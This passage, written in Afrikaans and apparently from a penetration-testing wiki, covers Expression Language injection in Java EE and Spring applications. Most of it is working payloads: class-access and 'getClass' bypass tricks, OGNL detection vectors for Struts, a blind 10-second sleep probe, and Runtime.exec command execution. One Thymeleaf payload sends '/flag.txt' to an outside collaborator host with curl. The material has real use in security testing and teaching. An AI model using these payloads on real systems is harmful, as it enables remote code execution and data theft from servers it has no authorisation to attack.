Expression Language (EL) is integraal in JavaEE vir die oorbrugging van die aanbiedingslaag (bv. webbladsye) en toepassingslogika (bv. bestuurde bone), wat hul interaksie moontlik maak. Dit word hoofsaaklik gebruik in:
JavaServer Faces (JSF): Vir die binding van UI-komponente aan agtergrond data/aksies.
JavaServer Pages (JSP): Vir data toegang en manipulasie binne JSP-bladsye.
Contexts and Dependency Injection for Java EE (CDI): Vir die fasilitering van weblaag interaksie met bestuurde bone.
Gebruik Konteks:
Spring Framework: Toegepas in verskeie modules soos Sekuriteit en Data.
Algemene Gebruik: Deur SpEL API deur ontwikkelaars in JVM-gebaseerde tale soos Java, Kotlin, en Scala.
EL is teenwoordig in JavaEE tegnologieë, standalone omgewings, en herkenbaar deur .jsp of .jsf lêer uitbreidings, stapfoute, en terme soos "Servlet" in koptekste. Dit is egter afhanklik van die weergawe se kenmerke en die gebruik van sekere karakters.
Afhangende van die EL weergawe mag sommige kenmerkeAan of Af wees en gewoonlik mag sommige karaktersverbode wees.
java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:.MainEnter a String to evaluate:{5*5}[25]
Let op hoe in die vorige voorbeeld die term {5*5} was geëvalueer.
#Basic string operations examples{"a".toString()}[a]{"dfd".replace("d","x")}[xfx]#Access to the String class{"".getClass()}[class java.lang.String]#Access ro the String class bypassing "getClass"#{""["class"]}#Access to arbitrary class{"".getClass().forName("java.util.Date")}[class java.util.Date]#List methods of a class{"".getClass().forName("java.util.Date").getMethods()[0].toString()}[public boolean java.util.Date.equals(java.lang.Object)]
Ontdekking
Burp ontdekking
gk6q${"zkz".toString().replace("k", "x")}doap2#The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.
J2EE opsporing
#J2EEScan Detection vector (substitute the content of the response body with the content of the "INJPARAM" parameter concatenated with a sum of integer):https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL
Slap 10 sekondes
#Blind detection vector (sleep during 10 seconds)https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
#Check the method getRuntime is there{"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}[public static java.lang.Runtime java.lang.Runtime.getRuntime()]#Execute command (you won't see the command output in the console){"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}[Process[pid=10892, exitValue=0]]#Execute command bypassing "getClass"#{""["class"].forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl <instance>.burpcollaborator.net")}# With HTMl entities injection inside the template<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}"th:title='pepito'>